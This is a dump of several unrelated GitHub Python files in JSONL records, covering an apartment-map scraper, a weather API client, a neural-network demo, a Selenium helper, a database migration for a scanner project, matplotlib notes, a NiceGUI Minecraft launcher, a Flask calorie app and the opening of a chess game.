ipyleaflet.Circle(\n location=interesting_coords, radius=15000, color=\"orange\", opacity=0.5, weight=2\n ).add_to(map_)\n ipyleaflet.Circle(\n location=interesting_coords, radius=20000, color=\"red\", opacity=0.5, weight=2\n ).add_to(map_)\n\n # add apartments\n for entry in apartments:\n addApartment(map_, entry)\n\n # save map\n map_.save(\"map.html\")\n\n\ndef scrape_properties(bairro, filtro, engine):\n new_property = get_results(bairro, filtro)\n new_property = pd.DataFrame(new_property)\n new_property = new_property.sort_values(by=[\"endereco\"], axis=0)\n\n # filter results already in the db\n with engine.connect() as conn:\n apartment_links = pd.read_sql(\n \"select link, endereco, lat, lon from apartments\", conn\n )\n type(apartment_links)\n len(apartment_links)\n\n key = new_property.link.isin(apartment_links.link)\n new_property = new_property.loc[~key, :]\n\n # add lat/lon of known addresses\n unique_adresses = apartment_links.loc[\n :, [\"endereco\", \"lat\", \"lon\"]\n ].drop_duplicates()\n new_property = pd.merge(new_property, unique_adresses, how=\"left\", on=\"endereco\")\n # checks\n print(new_property.shape)\n print(new_property.info())\n\n # Address\n # Geocoding an address\n key = new_property.lat.isna()\n search_addresses = new_property.loc[key, [\"endereco\"]].drop_duplicates()\n\n # checks\n print(\"Address shape: \")\n print(search_addresses.shape)\n print(\"How many addresses are already on the database: \")\n print(search_addresses.endereco.isin(apartment_links.endereco).describe())\n\n # Uses google geocoding API\n gmaps = googlemaps.Client(key=config(\"google_key\"))\n\n geocode_entries = {}\n dt_geocode = []\n for i, entry in search_addresses.iterrows():\n print(\"Buscando endereco: {}\".format(i))\n endereco = entry[\"endereco\"]\n geocode_result = gmaps.geocode(endereco)\n geocode_entries[i] = {\"query\": endereco, \"result\": geocode_result}\n dt_geocode.append(\n {\n \"endereco\": endereco,\n \"lat\": geocode_result[0].get(\"geometry\").get(\"location\").get(\"lat\"),\n \"lon\": geocode_result[0].get(\"geometry\").get(\"location\").get(\"lng\"),\n }\n )\n sleep(0.05)\n\n dt_geocode = pd.DataFrame(dt_geocode)\n # checks\n print(\"Google Maps geocoding info: \")\n print(dt_geocode.info())\n\n new_property = (\n pd.merge(new_property, dt_geocode, how=\"left\", on=[\"endereco\"])\n .assign(\n lat_x=lambda x: x.lat_x.fillna(x[\"lat_y\"]),\n lon_x=lambda x: x.lon_x.fillna(x[\"lon_y\"]),\n )\n .rename(columns={\"lat_x\": \"lat\", \"lon_x\": \"lon\"})\n .drop([\"lat_y\", \"lon_y\"], axis=1)\n )\n\n # add datetime and status\n new_property = new_property.assign(date=datetime.datetime.now(), status=\"new\")\n print(\"Final dataset head: \")\n new_property.head()\n print(\"Final dataset info: \")\n new_property.info()\n\n # change all previous status to old\n print(\"Updating dataset...\")\n engine.connect().execute(\"UPDATE apartments SET status = 'old';\")\n\n # Save results on sqlite db\n print(\"Saving new results...\")\n with engine.connect() as conn:\n new_property.to_sql(\"apartments\", conn, if_exists=\"append\", index=False)\n\n\ndef gen_map(engine, filename):\n # get results from sqlite db\n with engine.connect() as conn:\n apartments = pd.read_sql(\"select * from apartments where status ='new'\", conn)\n\n # apartments = temp\n apartments = apartments.assign(\n cluster=lambda x: x.groupby(\"endereco\").ngroup(),\n entries_by_cluster=lambda x: x.loc[:, [\"status\", \"endereco\"]]\n .groupby(\"endereco\")\n .transform(\"count\"),\n lat=lambda x: randomize_location(x, \"lat\"),\n lon=lambda x: randomize_location(x, \"lon\"),\n preco_tot=lambda x: (\n (\n x.aluguel.str.replace(\"[^0-9]\", \"\")\n .replace(\"\", \"0\")\n .replace(np.nan, \"0\")\n .astype(\"float64\")\n )\n + (\n x.cond.str.replace(\"[^0-9]\", \"\")\n .replace(\"\", \"0\")\n .replace(np.nan, \"0\")\n .astype(\"float64\")\n )\n ),\n )\n print(\"Map dataset shape: \")\n apartments.shape\n print(\"Map dataset info: \")\n apartments.info()\n\n apartments = [Apartment(**entry.to_dict()) for _, entry in apartments.iterrows()]\n\n # Map\n create_map(apartments, filename)\n","repo_name":"nettoyoussef/find_apartment","sub_path":"src/find_apartment.py","file_name":"find_apartment.py","file_ext":"py","file_size_in_byte":11667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74295136871","text":"import requests\r\nimport json\r\n\r\ndef get_weather(city):\r\n # Enter your OpenWeatherMap API key here\r\n api_key = \"YOUR_API_KEY\"\r\n\r\n # API endpoint URL\r\n url = f\"http://api.openweathermap.org/data/2.5/weather?q={city}&appid={api_key}\"\r\n\r\n try:\r\n # Send a GET request to the API\r\n response = requests.get(url)\r\n\r\n # Parse the JSON data from the response\r\n data = json.loads(response.text)\r\n\r\n # Extract relevant weather information\r\n weather = {\r\n \"city\": data[\"name\"],\r\n \"temperature\": data[\"main\"][\"temp\"],\r\n \"description\": data[\"weather\"][0][\"description\"],\r\n \"humidity\": data[\"main\"][\"humidity\"],\r\n \"wind_speed\": data[\"wind\"][\"speed\"]\r\n }\r\n\r\n # Return the weather information\r\n return weather\r\n except requests.exceptions.RequestException as e:\r\n # Handle any request errors\r\n print(\"Error:\", e)\r\n return None\r\n\r\n# Example usage\r\ncity = input(\"Enter city name: \")\r\nweather_info = get_weather(city)\r\n\r\nif weather_info:\r\n print(\"\\nWeather Information for\", weather_info[\"city\"])\r\n print(\"Temperature:\", weather_info[\"temperature\"], \"K\")\r\n print(\"Description:\", weather_info[\"description\"])\r\n print(\"Humidity:\", weather_info[\"humidity\"], \"%\")\r\n print(\"Wind Speed:\", weather_info[\"wind_speed\"], \"m/s\")","repo_name":"sohalsingh/weatherfinder","sub_path":"weatherfinder.py","file_name":"weatherfinder.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32009651524","text":"import time\nimport numpy as np\nimport h5py\nimport matplotlib.pylab as plt\nimport scipy\nfrom PIL import Image\nfrom scipy import ndimage\n#from NeuralNetwork.DeepNeuralNetwork.dnn_app_utils_v2 import *\n\nfrom NeuralNetwork.DeepNeuralNetwork.DNNmodel import *\nfrom NeuralNetwork.DeepNeuralNetwork.dnn_app_utils_v2 import sigmoid, sigmoid_backward, relu, relu_backward, load_data, predict, print_mislabeled_images\n\nplt.rcParams['figure.figsize'] = (5.0, 4.0) # set default size of plots\nplt.rcParams['image.interpolation'] = 'nearest'\nplt.rcParams['image.cmap'] = 'gray'\n\nnp.random.seed(1)\n\ntrain_x_orig, train_y, test_x_orig, test_y, classes = load_data()\n\nm_train = train_x_orig.shape[0] # the number of examples\nnum_px = train_x_orig.shape[1] # the number of px\nm_test = test_x_orig.shape[0] # the number of test examples\n\ntrain_x_flatten = train_x_orig.reshape(train_x_orig.shape[0], -1).T\ntest_x_flatten = test_x_orig.reshape(test_x_orig.shape[0], -1).T\n\ntrain_x = train_x_flatten / 255\ntest_x = test_x_flatten / 255\n\ndef L_layer_model(X, Y, layers_dims, learning_rate = 0.0075, num_iterations = 3000, print_cost = False):\n \"\"\"\n Arguments:\n X -- data, numpy array of shape (number of examples, num_px * num_px * 3)\n Y -- true \"label\" vector (containing 0 if cat, 1 if non-cat), of shape (1, number of examples)\n layers_dims -- list containing the input size and each layer size, of length (number of layers + 1).\n learning_rate -- learning rate of the gradient descent update rule\n num_iterations -- number of iterations of the optimization loop\n print_cost -- if True, it prints the cost every 100 steps\n\n Returns:\n parameters -- parameters learnt by the model. They can then be used to predict.\n \"\"\"\n\n np.random.seed(1)\n costs = []\n # 1 initialize\n parameters = initialize_parameters_deep(layers_dims)\n L = len(layers_dims) - 1\n AL = \"A\" + np.str(L)\n # 2 loop\n for i in range(num_iterations):\n # a forward propagation\n AL, caches = L_model_forward(X, parameters)\n\n # b cost\n cost = compute_cost(AL, Y)\n\n # c backward propagation\n grads = L_model_backward(AL, Y, caches)\n\n # d update\n parameters = update_parameters(parameters, grads, learning_rate)\n\n if i % 100 == 0:\n costs.append(cost)\n if print_cost:\n print(\"cost after %i iterations is: %f\" % (i, cost))\n '''\n plt.plot(np.squeeze(costs))\n plt.ylabel('cost')\n plt.xlabel('iterations (per tens)')\n plt.title(\"Learning rate =\" + str(learning_rate))\n plt.show()\n '''\n return parameters\n\nlayers_dims = [12288, 20, 7, 5, 1]\nparameters = L_layer_model(train_x, train_y, layers_dims, num_iterations = 2500, print_cost = True)\n\ndef cat_generization(parameter, iteration_num = 20000, target = 1, learning_rate = 500):\n #cat = np.zeros(shape=(12288, 1)) * 255\n cat = np.random.randint(low=0, high=255, size=(12288, 1))\n for i in range(iteration_num):\n cat = np.clip(cat, 0.0, 255.0)\n AL, caches = L_model_forward(cat / 255.0, parameter)\n cost = -1.0 / 1 * np.sum(np.multiply(target, np.log(AL)) + np.multiply(1 - target, np.log(1 - AL)))\n grads = L_model_backward(AL, target, caches)\n cat_grads = grads[\"dA_prev\"]\n cat -= learning_rate * cat_grads\n if i % 1000 == 0:\n print(cost)\n return cat\n\n\ncat = cat_generization(parameters) / 255.0\ncat = np.clip(cat, 0.0, 1.0)\nprob, caches = L_model_forward(cat, parameters)\nmy_predicted_image = predict(cat, 1, parameters)\nad_image = cat.reshape(64, 64, 3)\nprint(prob)\n#plt.imshow(image)\nplt.imshow(ad_image)\n\nplt.show()\nprint (\"y = \" + str(np.squeeze(my_predicted_image)) + \", your L-layer model predicts a \\\"\" + classes[int(np.squeeze(my_predicted_image)),].decode(\"utf-8\") + \"\\\" picture.\")\n","repo_name":"vandeppce/DeepLearning","sub_path":"NeuralNetwork/DeepNeuralNetwork/GenerateCat.py","file_name":"GenerateCat.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21586732831","text":"\"\"\"Subscribe to events\"\"\"\n\nfrom selenium.webdriver.common.by import By\n\nfrom .common import printdebug\n\n\ndef subscribe_to_events(config, driver, debug):\n \"\"\"Subscribe to events\"\"\"\n if debug:\n printdebug('subscribing to events')\n events = config['github_app']['subscribe_to_events']\n\n for event, subscribe in events.items():\n handle_subscription(event, subscribe, driver, debug)\n\n\ndef handle_subscription(event, subscribe, driver, debug):\n \"\"\"Handle subscription to event\"\"\"\n if subscribe:\n if debug:\n printdebug(f\"subscribing to: '{event}'\")\n printdebug('finding event checkbox')\n xpath = f\"//input[@type='checkbox' and @value='{event}']\"\n checkbox = driver.find_element(By.XPATH, xpath)\n if not checkbox.is_selected():\n if debug:\n printdebug('event checkbox is NOT already checked')\n printdebug('clicking on event checkbox')\n checkbox.click()\n else:\n if debug:\n printdebug('event checkbox IS already checked')\n printdebug('doing nothing')\n else:\n printdebug(f\"NOT subscribing to: '{event}'\")\n","repo_name":"mokshadharma/the-animal","sub_path":"lib/subscribe_to_events.py","file_name":"subscribe_to_events.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"24660576813","text":"\"\"\"add sqlmap\n\nRevision ID: b4d50f3f1bcf\nRevises: bba37bac95b0\nCreate Date: 2021-03-15 14:37:16.465349\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'b4d50f3f1bcf'\ndown_revision = 'bba37bac95b0'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n\top.create_table('sqlmap',\n\t\tsa.Column('path_id', sa.Integer(), nullable=False),\n\t\tsa.Column('clean', sa.Boolean(), server_default=sa.text('false'), nullable=False),\n\t\tsa.Column('output', postgresql.JSONB(astext_type=sa.Text()), nullable=True),\n\t\tsa.Column('updated_dttm', postgresql.TIMESTAMP(), server_default=sa.text('to_timestamp(0)'), nullable=False),\n\t\tsa.ForeignKeyConstraint(['path_id'], ['path.path_id'], ondelete=\"CASCADE\" ),\n\t\tsa.PrimaryKeyConstraint('path_id'),\n\t\tschema='scans'\n\t)\n\top.create_index(op.f('ix_scans_sqlmap_updated_dttm'), 'sqlmap', ['updated_dttm'], unique=False, schema='scans')\n\top.alter_column(\n\t\ttable_name=\"path\",\n\t\tcolumn_name=\"vars\",\n\t\ttype_=postgresql.JSONB\n\t)\n\n\ndef downgrade():\n\top.alter_column(\n\t\ttable_name=\"path\",\n\t\tcolumn_name=\"vars\",\n\t\ttype_=postgresql.JSON\n\t)\n\top.drop_index(op.f('ix_scans_sqlmap_updated_dttm'), table_name='sqlmap', schema='scans')\n\top.drop_table('sqlmap', schema='scans')\n\n","repo_name":"IMEsec-USP/VuMoS","sub_path":"src/alembic/alembic/versions/20210315143716_b4d50f3f1bcf_add_sqlmap.py","file_name":"20210315143716_b4d50f3f1bcf_add_sqlmap.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39578972675","text":"'''\r\n1. 축약함수(lambda)\r\n - 한 줄 함수\r\n 형식) 변수 = lambda 인수 : 리턴값\r\n ex) lambda x,y : x+y\r\n\r\n2. scope\r\n - 전역변수, 지역변수(함수)\r\n\r\n'''\r\n\r\n# 1. 축약함수\r\ndef adder(x,y) :\r\n add = x+y\r\n return add\r\n# lambda 함수를 사용해서 위함수를 한줄로 표현가능\r\nadd = lambda x,y : x+y\r\n # 리스트 내포에 활용 : [lambda x,y : x+y for 변수 in 열거형객체]\r\nre = add(3,2)\r\nprint(re) # 5\r\n\r\n\r\n# 2. scope\r\n''' 전역변수 : 전지역에서 사용되는 변수\r\n 지역변수 : 특정 지역(함수) 안에서만 사용되는 변수 '''\r\nx = 50\r\n\r\n# 지역변수\r\ndef local_func(x) :\r\n x # 지역변수\r\n x += 50 # x = 100 : 지역변수 < 값이 나오지않는다.>\r\n # 해당 함수가 종료되면 자동으로 소멸\r\nlocal_func(x) # x = 50\r\nprint('x =', x) # x = 50\r\n\r\n# 전역변수\r\ndef global_func() :\r\n global x # 전역변수\r\n x += 50 # x = 100 : 전역변수 <값이 나온다>\r\nglobal_func() # x = 100\r\nprint('x =', x) # x = 100\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"yangmyongho/3_Python","sub_path":"chap05_Function_lecture/step04_lambda_scope.py","file_name":"step04_lambda_scope.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25542530980","text":"\n# coding: utf-8\n\n# # Matplotlib——高级图\n# \n# 图是用来更好的解释数据\n# \n# 目标:让老板或客户印象深刻,一目了然\n# \n# 1. 饼状图\n# 2. 柱状图\n# 3. 散点图\n# 4. 概率图\n# 5. 组合图\n# 6. 三维数据图\n# 7. 美化\n\n# In[1]:\n\n#get_ipython().magic(u'matplotlib inline')\n\n\n# ## 1. 饼状图\n\n# In[61]:\n\nimport matplotlib.pyplot as plt\n\nplt.figure(figsize=(9,6))\n\n# The slices will be ordered and plotted counter-clockwise.\nlabels = [u'直接访问', u'外部链接', u'搜索引擎']\nsizes = [160, 130, 110]\ncolors = ['yellowgreen', 'gold', 'lightskyblue']\n\n#explode 爆炸出来,每个饼图块之间的\nexplode = (0.05, 0.0, 0.0) \n\npatches, l_texts, p_texts = plt.pie(sizes, explode=explode, labels=labels, colors=colors, labeldistance=0.8,\n autopct='%3.1f%%', shadow=False, startangle=90, pctdistance=0.6)\n\n# 设置x,y轴刻度一致,这样饼图才能是圆的\nplt.axis('equal')\n#plt.legend()\n\n \nfor t in l_texts:\n t.set_size(20)\n\nfor t in p_texts:\n t.set_size(20)\n \nplt.show()\n\n\n# ## 2. 柱状图\n\n# In[70]:\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nplt.figure(figsize=(9,6))\n\nn = 12\nX = np.arange(n)+1\n# numpy.random.uniform(low=0.0, high=1.0, size=None), normal\nY1 = (1-X/float(n+1)) * np.random.uniform(0.5,1.0,n)\nY2 = (1-X/float(n+1)) * np.random.uniform(0.5,1.0,n)\n\n# bar and barh\nwidth = 0.5\nplt.bar(X, Y1, width=width, facecolor='#9999ff', edgecolor='white')\n#plt.bar(X, -Y2, width=width, facecolor='#ff9999', edgecolor='white')\n\n\"\"\"\nfor x,y in zip(X,Y1):\n plt.text(x+0.4, y+0.05, '%.2f' % y, ha='center', va= 'bottom')\n \nfor x,y in zip(X,-Y2):\n plt.text(x+0.4, y-0.15, '%.2f' % y, ha='center', va= 'bottom')\n\"\"\"\n\n#plt.ylim(-1.25,+1.25)\nplt.show()\n\n\n# ## 3. 散点图\n\n# In[74]:\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nplt.figure(figsize=(9,6))\n\nn = 1024\n\n# rand 和 randn\nX = np.random.randn(1,n)\nY = np.random.randn(1,n)\n\nT = np.arctan2(Y,X)\n\nplt.scatter(X,Y, s=75, c=T, alpha=.4, marker='o')\n\n#plt.xlim(-1.5,1.5), plt.xticks([])\n#plt.ylim(-1.5,1.5), plt.yticks([])\n\nplt.show()\n\n\n# ## 4. 概率分布\n\n# In[79]:\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nmu = 0\nsigma = 1\nx = mu + sigma*np.random.randn(10000)\n\nfig,(ax0,ax1)=plt.subplots(ncols=2, figsize=(9,6))\n\nax0.hist(x, 20, normed=1, histtype='bar', facecolor='g', alpha=0.75)\nax0.set_title('pdf')\n\nax1.hist(x, 20, normed=1, histtype='bar', rwidth=0.8, cumulative=True)\nax1.set_title('cdf')\n\nplt.show()\n\n\n# ## 5.组合图\n\n# In[81]:\n\n# ref : http://matplotlib.org/examples/pylab_examples/scatter_hist.html\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# the random data\nx = np.random.randn(1000)\ny = np.random.randn(1000)\n\n# 定义子图区域\nleft, width = 0.1, 0.65\nbottom, height = 0.1, 0.65\nbottom_h = left_h = left + width + 0.02\n\nrect_scatter = [left, bottom, width, height]\nrect_histx = [left, bottom_h, width, 0.2]\nrect_histy = [left_h, bottom, 0.2, height]\n\nplt.figure(1, figsize=(6, 6))\n\n# 根据子图区域来生成子图\naxScatter = plt.axes(rect_scatter)\naxHistx = plt.axes(rect_histx)\naxHisty = plt.axes(rect_histy)\n\n# no labels\n#axHistx.xaxis.set_ticks([])\n#axHisty.yaxis.set_ticks([])\n\n# now determine nice limits by hand:\nN_bins=20\nxymax = np.max([np.max(np.fabs(x)), np.max(np.fabs(y))])\nbinwidth = xymax/N_bins\nlim = (int(xymax/binwidth) + 1) * binwidth\nnlim = -lim\n\n# 画散点图,概率分布图\naxScatter.scatter(x, y)\naxScatter.set_xlim((nlim, lim))\naxScatter.set_ylim((nlim, lim))\n\nbins = np.arange(nlim, lim + binwidth, binwidth)\naxHistx.hist(x, bins=bins)\naxHisty.hist(y, bins=bins, orientation='horizontal')\n\n# 共享刻度\naxHistx.set_xlim(axScatter.get_xlim())\naxHisty.set_ylim(axScatter.get_ylim())\n\nplt.show()\n\n\n# In[7]:\n\n# ref http://matplotlib.org/examples/showcase/integral_demo.html\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef func(x):\n return (x - 3) * (x - 5) * (x - 7) + 85\n\na, b = 2, 9 # integral limits\nx = np.linspace(0, 10)\ny = func(x)\n\n# 画线\nfig, ax = plt.subplots()\nplt.plot(x, y, 'r', linewidth=2)\nplt.ylim(ymin=0)\n\n# 画阴影区域\nxf = x[np.where((x>a)&(x\n# 订单ID金额方式订单时间\n# \n# 1214693\n# 18\n# 支付宝 / IAP ...\n# 8/31/2015 18:41\n# \n# \n\n# In[ ]:\n\n\n\n","repo_name":"todoit/PythonNote","sub_path":"src/todoit/MatPlot/matplotlib_1.py","file_name":"matplotlib_1.py","file_ext":"py","file_size_in_byte":6199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4542013018","text":"\"\"\"Template tags for the ``task_list`` app.\"\"\"\nfrom django import template\nfrom django.core.urlresolvers import reverse\n\nregister = template.Library()\n\n\n@register.simple_tag()\ndef get_ctype_url(url_name, ctype_pk=None, obj_pk=None, **kwargs):\n \"\"\"Returns the correct url wheter or not a ctype_pk is given.\"\"\"\n if ctype_pk:\n kwargs.update({'ctype_pk': ctype_pk, 'obj_pk': obj_pk})\n return reverse(url_name, kwargs=kwargs)\n","repo_name":"bitlabstudio/django-task-list","sub_path":"task_list/templatetags/task_list_tags.py","file_name":"task_list_tags.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"39046282648","text":"\r\n# EDIT ON 07/27/23\r\n# To use the Launcher, visit [ip here]/launcher or by clicking the link in the main page.\r\n\r\nimport os\r\nimport subprocess\r\nimport zipfile\r\nfrom nicegui import ui\r\n\r\ncwd = os.getcwd()\r\nos.system('mkdir lnxt')\r\n\r\ndef unpack(targetfile, targetdir):\r\n with zipfile.ZipFile(targetfile) as zf:\r\n try:\r\n zf.extractall(targetdir)\r\n print('[WARN] Unpack Successfully.')\r\n except Exception as e:\r\n print(f'[ERROR] Failed when unpacking: {e}')\r\n\r\ndef change_version():\r\n print('Version changed')\r\n\r\ntry:\r\n with open(os.path.join(cwd, 'version.lnxt')) as verreadf:\r\n verread = verreadf.read()\r\n versions = verread.split('\\n')\r\n print('[INFO] Config loaded.')\r\nexcept FileNotFoundError:\r\n print('[WARN] Config file not detected.')\r\n\r\n@ui.page('/')\r\ndef index():\r\n ui.label('Demo').style('color: #6E93D6; font-size: 200%; font-weight: 300')\r\n\r\n def show(event):\r\n name = type(event.sender).__name__\r\n ui.notify('value已设定为:114514')\r\n\r\n ui.button('按钮 (连点来测手速)', on_click=lambda: ui.notify('点,点,点击'))\r\n\r\n with ui.row():\r\n ui.checkbox('向互联网泄露你的隐私', value=True)\r\n ui.switch('千万不要反复扳动这个开关!', on_change=show)\r\n\r\n ui.radio(['A', 'B', 'C'], value='A').props('inline')\r\n\r\n with ui.row():\r\n ui.input('输入文字...')\r\n ui.select(['One', 'Two'], value='One')\r\n\r\n ui.link('在浏览器中像专业人士一样启动Minecraft?!', '/launcher').classes('mt-8')\r\n\r\n class Demo:\r\n def __init__(self):\r\n self.number = 1\r\n\r\n demo = Demo()\r\n\r\n ui.upload(on_upload=lambda e: ui.notify(f'已上传 {e.name}')).classes('max-w-full')\r\n\r\n ui.textarea(label='大输入框子!', placeholder='你好啊\\n你想在这里说些什么呢?\\n赶紧敲进来吧~', on_change=lambda e: result.set_text('啊,你输入了: ' + e.value))\r\n result = ui.label()\r\n\r\n v = ui.checkbox('启用某个非常秘密的控制面板', value=False)\r\n with ui.column().bind_visibility_from(v, 'value'):\r\n knob = ui.knob(0.3, show_value=True)\r\n with ui.knob(color='orange', track_color='grey-2').bind_value(knob, 'value'):\r\n ui.icon('volume_up')\r\n ui.slider(min=1, max=3).bind_value(demo, 'number')\r\n ui.toggle({1: 'A', 2: 'B', 3: 'C'}).bind_value(demo, 'number')\r\n ui.number().bind_value(demo, 'number')\r\n label = ui.label('变色龙?')\r\n ui.color_input(label='色', value='#000000', on_change=lambda e: label.style(f'color:{e.value}'))\r\n ui.date(value='2023-1-1', on_change=lambda e: result.set_text(e.value))\r\n result = ui.label()\r\n ui.time(value='11:45', on_change=lambda e: result.set_text(e.value))\r\n result = ui.label()\r\n\r\n@ui.page('/launcher')\r\ndef launch():\r\n def login():\r\n print('[INFO] Launching login process')\r\n unpack('launcher.dll', os.path.join(cwd, 'lnxt', 'launcher'))\r\n os.system(os.path.join(cwd, 'lnxt', 'launcher', 'cmcl.exe account --login=authlib --address=https://littleskin.cn/api/yggdrasil'))\r\n os.system(f'del /q \"{os.path.join(cwd, \"lnxt\", \"launcher\", \"cmcl.exe\")}\"')\r\n\r\n def login_offline():\r\n username = 'Steve'\r\n print('[INFO] Launching login process')\r\n unpack('launcher.dll', os.path.join(cwd, 'lnxt', 'launcher'))\r\n os.system(os.path.join(cwd, 'lnxt', 'launcher', f'cmcl.exe account --login=offline --name={username}'))\r\n os.system(f'del /q \"{os.path.join(cwd, \"lnxt\", \"launcher\", \"cmcl.exe\")}\"')\r\n\r\n def register():\r\n print('[INFO] Launching browser')\r\n os.system('start https://littleskin.cn/')\r\n\r\n def check_update():\r\n print('[INFO] Checking update from the server...')\r\n\r\n def launch_mc(version):\r\n footer.toggle()\r\n launch_bt.visible = False\r\n ver_name = f'\"{version}\"'\r\n\r\n #[[Inject the launch code here]]\r\n\r\n launch_bt.visible = True\r\n\r\n with ui.header().classes(replace='row items-center') as header:\r\n ui.button(icon='style').props('flat color=white')\r\n with ui.tabs() as tabs:\r\n ui.tab('启动')\r\n ui.tab('版本')\r\n ui.tab('下载')\r\n ui.tab('Mod管理')\r\n ui.tab('选项')\r\n\r\n with ui.footer(value=False) as footer:\r\n with ui.column():\r\n ui.label('正在启动Minecraft').style('color: #FFFFFF; font-size: 200%; font-weight: 300')\r\n # To use the progressbar(which is developing) with no actural use:\r\n # progressbar = ui.linear_progress(value=0).props('instant-feedback')\r\n ui.label('请耐心等待...')\r\n\r\n with ui.page_sticky(position='bottom-right', x_offset=20, y_offset=20):\r\n launch_bt = ui.button(on_click=launch_mc, icon='rocket').props('fab')\r\n\r\n with ui.tab_panels(tabs, value='启动').classes('w-full'):\r\n with ui.tab_panel('启动'):\r\n ui.label('启动面板').style('color: #6E93D6; font-size: 200%; font-weight: 300')\r\n ui.separator()\r\n with ui.column():\r\n ver_select = ui.select(versions, value=str(versions[0]))\r\n ui.button('管理登录', on_click=login).tooltip('管理Littleskin登录通行证')\r\n checkbox = ui.checkbox('使用离线登录 (你将无法使用多人游戏功能)')\r\n chk_var = ui.checkbox('补全文件 (会拖慢启动速度,但能解决大部分问题)')\r\n\r\n with ui.tab_panel('下载'):\r\n ui.label('Content of B')\r\n\r\n with ui.tab_panel('选项'):\r\n dark = ui.dark_mode()\r\n ui.label('个性化').style('color: #6E93D6; font-size: 200%; font-weight: 300')\r\n ui.label('切换主题:')\r\n ui.button('暗色', on_click=dark.enable)\r\n ui.button('亮色', on_click=dark.disable)\r\n ui.label('切换色调:')\r\n ui.button('默认蓝', on_click=lambda: ui.colors())\r\n ui.button('低调灰', on_click=lambda: ui.colors(primary='#555'))\r\n ui.separator()\r\n ui.label('Minecraft实例').style('color: #6E93D6; font-size: 200%; font-weight: 300')\r\n with ui.column():\r\n switch1 = ui.switch('启用版本隔离')\r\n switch2 = ui.switch('强制使用指定Java')\r\n switch3 = ui.switch('DUMMY SWITCH')\r\n switch4 = ui.switch('switch me')\r\n switch5 = ui.switch('switch me')\r\n switch6 = ui.switch('switch me')\r\n ui.label('启动选项').style('color: #6E93D6; font-size: 200%; font-weight: 300')\r\nui.run(title='webUI')\r\n","repo_name":"ccjjfdyqlhy/LauncherNext","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74345800551","text":"\"\"\"\nThe sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.\n\nFind the sum of all the primes below two million.\n1/15/17\n\"\"\"\n\n\ndef is_prime(num):\n \"\"\"\n Returns true for a prime number, otherwise false.\n \"\"\"\n import math\n\n\n if num % 2 == 0 and num > 2:\n return False\n for i in range(3, int(math.sqrt(num))+1, 2):\n if num % i == 0:\n return False\n return True\n\nprimes = list()\n\nfor i in range(3, 2000001, 2):\n if is_prime(i):\n primes.append(i)\n\nresult = sum(primes) + 2\n\n# print(primes)\nprint(result)\n","repo_name":"awarnes/projects","sub_path":"euler/problem10.py","file_name":"problem10.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70794206952","text":"from flask import Flask, render_template, request\r\nfrom temp import temp\r\nfrom calorie import Calorie\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('calories_form.html')\r\n\r\n@app.route('/calculate_calories', methods=['POST'])\r\ndef calculate_calories():\r\n weight = int(request.form['weight'])\r\n height = float(request.form['height'])\r\n age = int(request.form['age'])\r\n country = request.form['country'].lower()\r\n city = request.form['city'].lower()\r\n\r\n temperature = temp(country, city).get()\r\n calorie = Calorie(weight, height, age, temp=temperature)\r\n calculated_calories = calorie.calculate()\r\n\r\n return render_template('calories_result.html', calories=calculated_calories, temperature=temperature)\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n","repo_name":"mabdullahbaig/Real-time-Temperature-and-Calorie-App-in-Python","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6213888549","text":"import random\n\nclass ChessGame:\n def __init__(self):\n self.pieces = {\n 'white': {\n 'Pawn': '\\u2659',\n 'Rook': '\\u2656',\n 'Knight': '\\u2658',\n 'Bishop': '\\u2657',\n 'Queen': '\\u2655',\n 'King': '\\u2654'\n },\n 'black': {\n 'Pawn': '\\u265F',\n 'Rook': 